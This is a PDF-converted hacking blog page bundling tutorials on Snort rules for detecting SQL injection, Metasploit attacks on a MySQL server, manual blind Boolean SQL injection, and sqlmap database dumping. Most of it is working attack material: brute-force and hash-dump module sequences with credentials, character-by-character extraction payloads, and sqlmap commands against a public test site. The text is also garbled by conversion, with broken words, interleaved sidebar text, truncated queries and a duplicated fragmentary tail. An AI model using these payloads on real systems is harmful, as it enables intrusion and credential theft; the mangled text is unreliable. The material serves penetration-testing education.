Detect SQL Injection Attack Using Snort IDS

Hacking Articles
Raj Chandel's Blog
Author Web Penetration Testing Penetration Testing Courses We Offer My Books Donate us
POST CATEGORY : Database Hacking

Search
ENTER KEYWORD
Detect SQL Injection Attack using Snort IDS

posted in DATABASE HACKING , PENETRATION TESTING on JANUARY 11, 2018 Subscribe to Blog via
by RAJ CHANDEL with 0 COMMENT Email
Email Address
Hello friends!! Today we are going to discuss how to “Detect SQL injection attack” using
Snort but before moving ahead kindly read our previous both articles related to Snort SUBSCRIBE
Installation (Manually or using apt-respiratory)and its rule con guration to enable it as
IDS for your network.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Basically In this tutorial we are using snort to capture the network traf c which would
analysis the SQL Injection quotes when injected in any web page to obtain information of
    
database system of any web server. Snort will generate the alert for malicious traf c when
caught those traf c in its network and network administers will immediately get attentive
against suspicious traf c and could take effective action against the attacking IP.
Requirement
IDS: Snort (Ubuntu)
Web application: Dhakkan
You can con gure your own web server by taking help of our article “Con gure Web server
for penetration testing”
Let’s Begin!!
Identify Error Based SQL Injection

As we know in Error based SQL injections the attacker use single quotes (‘) or double
quotes (“) to break down SQL query for identify its vulnerability. Therefore be smart and
add a rule in snort which will analyst Error based SQL injection on the server when
someone try to execute SQL query in your network for unprivileged access of database.
Execute given below command in ubuntu’s terminal to open snort local rule le in text
editor.
sudo gedit /etc/snort/rules/local.rules
Now add given below line which will capture the incoming traf c coming on any network IP
via port 80.
alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “%27” ;
sid:100000011; )
alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “22” ; Categories
sid:100000012; )  BackTrack 5 Tutorials
If you read above rule you can notice that I had applied lter for content “%27” and %22  Best of Hacking
are URL encoded format use in browser for single quotes(‘) and double quotes (“)  Browser Hacking
respectively at the time of execution of URL.
 Cryptography & Stegnography
Turn on IDS mode of snort by executing given below command in terminal:  CTF Challenges
sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0  Cyber Forensics
 Database Hacking
 Domain Hacking
 Email Hacking
 Footprinting
 Hacking Tools
 Kali Linux
Now test your above rule by making Error based sql injection attack on web application  Nmap
“Dhakkan”, therefore open the server IP in web browser and use single quotes (‘) for  Others
identify SQL injection vulnerability as shown below.
 Penetration Testing
192.168.1.20/sqli/Less-1/?id=1’  Social Engineering Toolkit
For more detail on Error Based SQL injection read our previous article.  Trojans & Backdoors
Now when attacker will execute malicious quotes in browser for testing Error Base SQL  Website Hacking
injection then the IDS of the network should also capture this content and will generate the  Window Password Hacking
alert.  Windows Hacking Tricks
 Wireless Hacking
 Youtube Hacking
Articles
Select Month 
Facebook Page
Ignite Technolo…
5.2K likes
Like Page
Be the first of your friends to like this
As per our prediction from given image you can observe the snort has gerenated alert for
Error Based sql injection when capture malicious quotes.
So when the network admin get alert from IDS on the basis of it he can take action against
attacking IP, as shown in given image the malicous traf c is coming form 192.168.1.21 on
port 80.
Testing Double Quotes Injection
Now again open the server IP in web browser and use double quotes (“) for identify SQL
injection vulnerability as shown below.
192.168.1.20/sqli/Less-4/?id=1”
Now when attacker will execute malicious quotes in browser for testing Double quotes
SQL injection then the IDS of the network should also capture this content and will
generate the alert.
From given image you can observe the snort has gerenated alert for Error Based sql
injection when capture malicious quotes.
attacking IP, as shown in given image the malicous traf c is coming from 192.168.1.21 on
port 80.
Boolean Based SQL Injection

As we know in Boolean based SQL injections the attacker use AND /OR operators where
attacker will try to con rm if the database is vulnerable to Boolean SQL Injection by
evaluating the results of various queries which return either TRUE or FLASE.
Now add a rule in snort which will analyse Boolean based SQL injection on the server when
Here I had applied lter for content “and” & “or” to be captured. Here nocase denotes not
case sensitive it can be as AND/and, OR/or.
alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase;
sid:100000060; )
alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase;
sid:100000061; )
Turn on IDS mode of snort by executing given below command in terminal:
sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0
Again open the server IP in web browser and use AND operator for identify Boolean SQL
192.168.1.20/sqli/Less-8/?id=1’ AND 1=1 –+
For more detail on Boolean Based SQL injection read our previous article.
Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL
injection then the IDS of the network should also capture this content and will generate the
alert.
Testing OR Operator
As per our calculation from given image you can observe the snort has gerenated alert for
Boolean Based sql injection when captured content AND.
port 80.
Again open the server IP in web browser and use OR operator to identify Boolean SQL
192.168.1.20/sqli/Less-8/?id=1’ OR 1=1 –+
alert.
Boolean Based sql injection when captured content OR.
port 80.
Encoded AND/OR
Similarly in given below rule I had applied lter for content “%26%26” and “%7c%7c” are
URL encoded format use in browser for && and || respectively at the time of execution of
URL.
alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase;
sid:100000008; )
alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase;
sid:100000009; )
Again open the server IP in web browser and use && operator for identify Boolean SQL
192.168.1.20/sqli/Less-25/?id=1’ %26%26 1==1 –+
For more details read our previous article
alert.
Boolean Based sql injection when captured content %26%26.
port 80.
Testing Encoded OR Operator
Again open the server IP in web browser and use || operator for identify Boolean SQL
192.168.1.20/sqli/Less-25/?id=1’ %7C%7C 1==1 –+
alert.
Boolean Based sql injection when captured content %7C %7C.
port 80.
Identify Form Based SQL Injection

The Form Based SQL injection also known as “Post Error based SQL injection” because the
attacker executes malicious quotes inside Login form of a web page that contains text eld
for username and password to login inside web server.
Therefore now add a rule in snort which will analyst Form based SQL injection on the
server when someone try to execute SQL query in your network for unprivileged access of
database.
alert tcp any any -> any 80 (msg: “Form Based SQL Injection”; content: “%27” ;
sid:1000003; )
If you read above rule you can notice that I had applied lter for content “%27” to be
captured; turn on IDS mode of snort by executing given below command in terminal:
I had used single quotes (‘) to break the query inside the text eld of username then click
on submit.
Username: ’
From the given screenshot you can see we have got error message (in blue colour) which
means the database is vulnerable to SQL injection.
For more detail on Form Based SQL injection read our previous article.
Now when attacker will execute malicious quotes in browser for testing Form Base SQL
alert.
Form Based sql injection when capture malicious quotes.
port 80.
Identify Order by SQL Injection
In order to identify number of column in database the un-trusted user may use order
by clause which will arrange the result set in ascending or descending order of the columns
used in the query.
Now add a rule in snort which will analyst order by SQL injection on the server when
Here again that I had applied lter for content “order” to be captured.
alert tcp any any -> any 80 (msg: “Order by SQL Injection”; content: “order” ;
sid:1000005; )
Now again open the server IP in web browser and use string order by for identify column of
database as shown below.
192.168.1.20/sqli/Less-1/?id=1′ order by 1,2,3 –+
Now when attacker will execute malicious string in browser for testing order by SQL
alert
order by sql injection when capture malicious string.
attacking IP, as shown in given image the malicious traf c is coming form 192.168.1.21 on
port 80.
Identify Union Based SQL Injection
We all know in Error base SQL injection attacker may use the UNION operator to combine
the result-set of two or more SELECT statements. Therefore add a rule in snort which will
analyst Union select SQL injection on the server when someone try to execute SQL query
in your network for unprivileged access of database. Here again that I had applied lter for
content “union” to be captured.
alert tcp any any -> any 80 (msg: “UNION SELECT SQL Injection”; content: “union” ;
sid:1000006; )
Now again open the server IP in web browser and use string order by for identify column of
database as shown below.
192.168.1.20/sqli/Less-1/?id=-1′ union select 1,2,3 –+
Now when attacker will execute malicious string in browser for testing Union select SQL
alert.
union select sql injection when capture malicious string.
attacking IP, as shown in given image the malicious traf c is coming form 192.168.1.21 on
port 80.
Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Penetration Testing on MYSQL (Port 3306)

posted in DATABASE HACKING , KALI LINUX , PENETRATION TESTING on SEPTEMBER 21, 2017
by RAJ CHANDEL with 1 COMMENT
Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In
our previous article we had already discussed how to con gure of mysql in ubuntu which
you can read from here, now moving towards for its penetration testing.
Attacker: kali Linux
Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216
Lets start !!
Scanning MYSQL
Scanning plays an important role in penetration testing because through scanning attacker
make sure which services and open ports are available for enumeration and attack.
Here we are using nmap for scanning port 3306.
nmap -sT 192.168.1.216
If service is activated in targeted server then nmap show open STATE for port 3306.
Enumerating MYSQL Banner
An attacker always perform enumeration for nding important information such
as software version which known as Banner Grabbing and then identify it state of
vulnerability against any exploit.
Open the terminal in your kali Linux and Load metasploit framework; now type following
command to scan for MYSQL version.
use auxiliary/scanner/mysql /mysql _version
msf auxiliary(mysql_version) > set rhosts 192.168.1.216
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > run
From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the
installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.
MYSQL Brute Force Attack
An attacker always tries to make brute force attack for stealing credential for unauthorized
access.
This module simply queries the MySQL instance for a speci c user/pass (default is root
with blank).
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.216
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_ le /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_ le /root/Desktop/password.txt
msf auxiliary(mysql_login) > run
This will start brute force attack and try to match the combination for valid username and
password using user.txt and pass.txt le.
From given image you can observe that our mysql server is not secure against brute force
attack because it is showing matching combination of username: root and password:
toor for login.
Once the attacker retrieves the valid credential he can directly login into mysql server for
stealing or destroying the database information.
Stealing MYSQL information

This module allows for simple SQL statements to be executed against a MySQL instance
given the appropriate credentials.
use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set rhost 192.168.1.216
msf auxiliary(mysql_sql) > set username root
msf auxiliary(mysql_sql) > set password toor
msf auxiliary(mysql_sql) > set SQL show databases;
msf auxiliary(mysql_sql) > run
From given image you can observe that it has executed the sql query for dumping the name
of databases.
Extracting MYSQL Schema Information

This module extracts the schema information from a MySQL DB server.
use auxiliary/scanner/mysql/mysql_schemadump
msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216
msf auxiliary(mysql_schemadump) >set username root
msf auxiliary(mysql_schemadump) >set password toor
msf auxiliary(mysql_schemadump) >run
here it has dump the information schema for database “ignite” with table name “student” , 5
columns name with column types:
DB: ignite
Table name: student
Last Name First Name Student ID Major Dorm
(varchar 30) (varchar 30) (int 11) (varchar 20) (varchar 20)
Check File Privileges
Open my.cnf le to verify le privileges using following command:
gedit /etc/mysql/my.cnf
Here you can see given below statements are uncommented
Mysqld_safe
Mysqld
Secure_ le _priv
If these statements are uncommented then it becomes very easy for attacker to perform
le enumeration.
Mysql File Eumeration

This module will enumerate les and directories using the MySQL load_ le feature.
Use auxiliary/scanner/mysql/mysql_ le_enum
msf auxiliary(mysql_ le_enum) > set rhosts 192.168.1.216
msf auxiliary(mysql_ le_enum) > set username root
msf auxiliary(mysql_ le_enum) > set password toor
msf auxiliary(mysql_ le_enum) > set DIR_LIST/root/Desktop/ le.txt
msf auxiliary(mysql_ le_enum) > run
Here it will start identifying whether the given les list is exist in the target system or not.
From given image you can observe that it has found /etc, /var, /var/www such directory
exists.
Enumerate MYSQL writeable directories

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for
more information see the URL in the references. ***Note: For every writable directory
found, a le with the speci ed FILE_NAME containing the text test will be written to the
directory. ***
use auxiliary/scanner/mysql/mysql_writable_dirs
msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216
msf auxiliary(mysql_writable_dirs) > set username root
msf auxiliary(mysql_writable_dirs) > set password toor
msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/ le.txt
msf auxiliary(mysql_writable_dirs) > run
Here we had assign a list of les so that we can identify the writable directory and from
given image you can observe that it has found writable permission only for /tmp.
Mysql User Enumeration
This module allows for simple enumeration of MySQL Database Server provided proper
credentials to connect remotely.
use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.216
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > set password toor
msf auxiliary(mysql_enum) > run
It will start retrieving information such as list of other user account and user privileges on
mysql server.
From given image it will be clear to you, that it has shown list of account with hash
password and list of user who have GRANT privileges.
As you can see other than user root it has some more user such as sr with hash password,
here you can crack this password using password cracker tool.
Extract MYSQL Username with Hash Password
This module extracts the usernames and encrypted password hashes from a MySQL server
and stores them for later cracking.
use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > set toor
msf auxiliary(mysql_hashdump) > run
Now from screenshot you can see the hash value of password is given for all users.
Metasploit store these hash value inside /tmp folder and later use john the ripper for
cracking password.
Crack Hash Password with John the Ripper
This module uses John the Ripper to identify weak passwords that have been acquired
from the mysql_hashdump module. Passwords that have been successfully cracked are
then saved as proper credentials
use auxiliary/analyze/jtr_mysql_fast
msf auxiliary(jtr_mysql_fast) >options
msf auxiliary(jtr_mysql_fast) >run
By default it will use metasploit wordlist where hash value has been saved and start
cracking hash value.
If you notice the given below image you can perceive that it has successfully crack the
double SHA-1 hashing and decrypt the password into plain text.
Now using above retrieved credential you can try to login into mysql server.
Here you can see we had successfully login into server. Hence attacker can easily breach
the security of server and steal the important information or modify it.
Secure MYSQL through port forwarding
In order to secure mysql server admin can forward port from default to speci c port to run
the service. Open my.conf le using following command for making changes:
gedit /etc/mysql/my.conf
Now change port 3306 into any other port such as 3000 as shown in given image and save
the changes and restart the service.
service mysql restart
Verify it using nmap command as given below:
nmap -sT 192.168.1.216
Prevent Mysql against brute force attack
In order to secure mysql server admin can bind the service to its localhost. Open my.conf
le using following command for making changes:
gedit /etc/mysql/my.conf
Only you need to enable bind-address by making it uncomment as shown in given images.
service mysql rstart
Now let’s verify it by making brute force attack same as above using dictionary.
Great!! Attacker is not able to connect the server which resists brute force attack also as
shown in given image.
Admin should GRANT all privilege to a speci c user only with speci c IP address which
prevents database information alteration from attackers.
Now for granting all privileges; login into mysql server and type following query:
mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’

WITH GRANT OPTION;
To tell the server to reload the grant tables, perform a ush-privileges operation
mysql > ush privileges;
Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher
Contact Here
Beginner Guide to SQL Injection Boolean Based (Part 2)

posted in DATABASE HACKING , KALI LINUX , PENETRATION TESTING on JULY 9, 2017
Their so many ways to hack the database using SQL injection as we had seen in our
previous tutorial Error based attack, login formed based attack and many more different
type of attack in order to retrieve information from inside database. In same way today we
will learn a new type of SQL injection attack known as Blind Boolean based attack.
An attacker always check SQL injection vulnerability using comma (‘) inside URL to break
the statement in order to receive sql error message. It is a ght between developer and
attacker, the developer increases the security level and attacker try to break it. This time
developer had blocked error message as the output on the website. Hence if database is
vulnerable to SQL injection then attacker do not obtain any error message on
website.Attacker will try to con rm if the database is vulnerable to Blind SQL Injection
by evaluating the results of various queries which return either TRUE or FLASE.
Let’s start!!
Using Dhakkan we will demonstrate blind SQL injection.
Lesson 8
Lesson 8 is regarding blind boolean based injection therefore rst we need to explore
http://localhost:81/sqli/Less-8/?id=1 on browser, this will send the query into database.
1 SELECT * from table_name WHERE id=1
As output it will display “you are in” the yellow colour text on the web page as shown in
given image.
When attacker tries to break this query using comma (‘) http://localhost:81/sqli/Less-8/?
id=1’
Or other different technique he will not able to found any error message. More over
yellow colour text will disappear if attack tries to inject invalid query which also shown in
given image.
Then attacker will go for blind sql injection to make sure, that inject query must return an
answer either true or false.
1 http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+
2 SELECT * from table_name WHERE id=1' AND 1=1
Now database test for given condition whether 1 is equal to 1 if query is valid it returns
TRUE, from screenshot you can see we have got yellow colour text again “you are in”,
which means our query is valid.
In next query which check for URL
1 http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+
2 SELECT * from table_name WHERE id=1' AND 1=0
Now it will test the given condition whether 1 is equal to 0 as we know 1 is not equal to 0
hence database answer as ‘FLASE’ query. From screenshot it con rms when yellow colour
text get disappear again.
Hence it con rms that the web application is infected to blind sql injection. Using true and
false condition we are going to retrieve database information.
Length of database string

Following query will ask the length of database string. For example the name of database is
IGNITE which contains 6 alphabets so length of string for database IGNITE is equal to 6.
Similarly we will inject given below query which will ask whether length of database string
is equal to 1, in response of that query it will answer by returning TRUE or FALSE through
text “you are in”.
1 http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1 --+
From given screenshot you can see again the text gets disappear which means it has return
FALSE to reply NO the length of database string is not equal to 1
Again it will test the length of database string is equal to 2; it has return FALSE to reply NO
the length of database string is not equal to 2. Repeat the same step till we do not receive
TRUE for string length 3/4/5/ and so on.
when I test for string is equal to 8; it answer as true and as result yellow colour text “you
are in” appears again.
As we know computer does not understand human language it can read only binary
language therefore we will use ASCII code. The ASCII code associates an integer value for
all symbols in the character set, such as letters, digits, punctuation marks, special
characters, and control characters.
For example look at following string ascii code:
1 = I = 73
2 = G = 71
3 = N = 78
4 = I = 73
5 = T = 84
6 = E = 69
Image Source:lookuptable.com
Further we will enumerate database name using ascii character for all 8 strings.
Next query will ask from database test the condition whether rst string of database name
is greater than 100 using acsii substring.
1 http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa
It re ects TRUE condition hence if you match the ascii character you will observe that from
100 small alphabets string has been running till 172.
Similarly it will test again whether rst letter is greater than 120. But this time it return
FALSE which means the rst letter is greater than 100 and less than 120.
Now next it will equate rst string from 101, again we got FALSE.
We had perform this test from 101 till 114 but receive FALSE every time.
Finally receive TRUE reply at 115 which means rst string is equal to 115, where 115 =‘s’
Similarly test for second string, repeat above step by replacing rst string from second.
I received TRUE reply at 101 which means second string is equal to 101 and 101 = ‘e’.
Similarly I had performed this for all eight strings and got following result:
Given query will test the condition whether the length of string for rst table is equal to 6
or not.
1 http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name f
In reply we receive TRUE and text “you are in” appears again on the web site.
Similarly I test for second and third table using same technique by replacing only table
number in same query.
1 = s = 115
2 = e = 101
3 = c =99
4 = u =117
5 = r =114
6 = i = 105
7 = t = 116
8 = y = 121
Table string length

We have to use same technique for enumerating information of the table from inside the
database. Given query will test the condition whether the length of string for rst table is
greater than 5 or not.
Given query will test the condition whether the length of string for rst table is greater
than 6 or not.
In reply we receive FALSE and text “you are in” disappears again from the web site.
Given query will test the condition whether the length of string for rst table is equal to 6
or not.
Similarly I test for second and third table using same technique by replacing only table
number in same query.
Similarly enumerating fourth table information using following query to test the condition
whether the length of string for fourth table is equal to 5 or not.
As we had performed in database enumeration using ascii code similarly we are going to
use same technique to retrieve table name.
Further we will enumerate 4th table name using ascii character for all 5 strings.
Next query will ask from database to test the condition whether rst string of table name is
greater than 115 using acsii substring.
1 http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_
It re ects TRUE condition text “you are in” appears again on the web site hence if you
match the ascii character.
Next query will ask from database to test the condition whether rst string of table name is
But this time it return FALSE which means the rst letter is greater than 115 and less than
120.
Proceeding towards equating the string from ascii code between number 115 to 120. Next
query will ask from database to test the condition whether rst string of table name is
It return FALSE, text get disappear.
It returns TRUE, text get appear.
Similarly we had test remaining strings and received following result
1 = u = 117
2 = s = 115
3 = e = 101
4 = r = 114
5 = s = 115
User Name Enumeration
Using same method we are going to enumerate length of string username from inside the
table users
Given below query will test for string length is equal to 4 or not.
1 http://localhost:81/sqli/Less-8/?id=1' AND (length((select username fro
It reply TRUE with help of yellow color text
Using same method we are going to enumerate username from inside the table users
Given below query will test for rst string using ascii code.
1 http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna
We received FALSE which means the rst string must be less than 100.
We received TRUE which means the rst string must be more than 50.
Similarly,
We received TRUE which means the rst string must be more than 60.
Similarly,
We received FALSE which means the rst string is less than 70.
Hence rst string must lie between 60 and 70 of ascii code.
Proceeding towards comparing string from different ascii code using following query.
This time successfully receive TRUE with appearing text “you are in”.
Similarly I had test for all four string in order to retrieve username:
1 = D = 68
2 = u = 117
3 = m = 109
4 = b = 98
Hence today we had learned how attacker hacked database using blind sql injection.
!!Try yourself to retrieve password for user dumb!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant Social Media Lover and Gadgets. Contact here
Database Penetration Testing using Sqlmap (Part 1)

posted in DATABASE HACKING , KALI LINUX , PENETRATION TESTING on JUNE 28, 2017
sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection aws and taking over of database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database ngerprinting, over data fetching from the
database, to accessing the underlying le system and executing commands on the
operating system via out-of-band connections.
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix
database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind,
error-based, UNION query-based, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
Automatic recognition of password hash formats and support for cracking them
using a dictionary-based attack.
Support to dump database tables entirely, a range of entries or speci c columns as
per user’s choice. The user can also choose to dump only a range of characters from
each column’s entry.
Support to search for speci c database names, speci c tables across all databases or
speci c columns across all databases’ tables. This is useful, for instance, to identify
tables containing custom application credentials where relevant columns’ names
contain string like name and pass.
Support to download and upload any le from the database server underlying le
system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the
database server underlying operating system when the database software is MySQL,
PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker
machine and the database server underlying operating system. This channel can be
an interactive command prompt, a Meterpreter session or a graphical user interface
(VNC) session as per user’s choice.
Support for database process’ user privilege escalation via Metasploit’sMeterpreter
getsystem command.
These options can be used to enumerate the back-end database management system
information, structure and data contained in the tables.
Sometimes you visit such websites that let you to select product item through their picture
gallery if you observer its URL you will notice that product item is call through its product-
ID numbers.
Let’s take an example
1 http://testphp.vulnweb.com/artists.php?artist=1
So when attacker visits such kind of website he always checks for SQL vulnerability inside
web server for lunching SQL attack.
Let’s check how attacker veri es SQL vulnerability.
Attacker will try to break the query in order to order to get error message, if he
successfully received error message then it con rms that web server is SQL injection
affected.
1 http://testphp.vulnweb.com/artists.php?artist=1'
From screenshot you can see we have received error message successfully now we have
make SQL attack on web server so that we can fetch database information.
Databases
For database penetration testing we always choose SQLMAP, this tool is very helpful for
beginners who are unable to retrieve database information manually or unaware from SQL
injection techniques.
Open the terminal in your Kali Linux and type following command which start SQL
injection attack on the targeted website.
1 sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --bat
-u: target URL
–dbs: fetch database name
–batch: This will leave sqlmap to go with default behavior whenever user’s input would be
required
Here from given screenshot you can see we have successfully retrieve database name
“acuart”
Tables
As we know a database is a set of record which consist of multiple table inside it therefore
now use another command in order to fetch entire table names from inside the database
system.
1 sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -
-D: DBMS database to enumerate (fetched database name)
–tables: enumerate DBMS database table
As a result given in screenshot we have enumerated entire table name of database system.
There are 8 tables inside database “acuart” as following:
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users
Columns
Now further we will try to enumerate column name of desired table. Since we know there
is a users table inside the database acuart and we want to know the all column names of
users table therefore we will generate another command for column captions
enumeration.
-T: DBMS table to enumerate (fetched table name)
–columns: enumerate DBMS database columns
Get data from a table

Slowly and gradually we have penetrated much details of database but last and most
important step is to retrieve information from inside the columns of a table. Hence at last
we will generate a command which will dump information of users table.
–dump: dump all information of DBMS database
Here from given screenshot you can see it has dump entire information of table users,
mainly users table contains login credential of other users. You can use these credential for
login into server on behalf other users.
Dump All
Last command is the most powerful command in sqlmap which will save your time in
database penetration testing; this command will perform all the above functions at once
and dump entire database information including table names, column and etc.
This will give you all information at once which contains database name as well as table’s
records.
Try it yourself!!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an

Information Security Consultant Social Media Lover and Gadgets. Contact here
← OLDER POSTS

Detect SQL Injection Attack Using Snort IDS

Uploaded by

Copyright:

Available Formats

Detect SQL Injection Attack Using Snort IDS

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Detect SQL Injection Attack Using Snort IDS

Uploaded by

Copyright:

Available Formats

Hacking Articles

Raj Chandel's Blog

POST CATEGORY : Database Hacking

Detect SQL Injection Attack using Snort IDS

IDS: Snort (Ubuntu)

Web application: Dhakkan

Identify Error Based SQL Injection

sudo gedit /etc/snort/rules/local.rules

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0  Cyber Forensics

Be the first of your friends to like this

Boolean Based SQL Injection

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

192.168.1.20/sqli/Less-8/?id=1’ AND 1=1 –+

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

192.168.1.20/sqli/Less-25/?id=1’ %26%26 1==1 –+

For more details read our previous article

192.168.1.20/sqli/Less-25/?id=1’ %7C%7C 1==1 –+

Identify Form Based SQL Injection

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

192.168.1.20/sqli/Less-1/?id=1′ order by 1,2,3 –+

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

192.168.1.20/sqli/Less-1/?id=-1′ union select 1,2,3 –+

Penetration Testing on MYSQL (Port 3306)

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Here we are using nmap for scanning port 3306.

nmap -sT 192.168.1.216

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_ le /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_ le /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

Stealing MYSQL information

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

Extracting MYSQL Schema Information

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

Table name: student

Last Name First Name Student ID Major Dorm

Here you can see given below statements are uncommented

Mysql File Eumeration

Use auxiliary/scanner/mysql/mysql_ le_enum

msf auxiliary(mysql_ le_enum) > set rhosts 192.168.1.216

mysql> GRANT ALL PRIVILEGES ON - TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’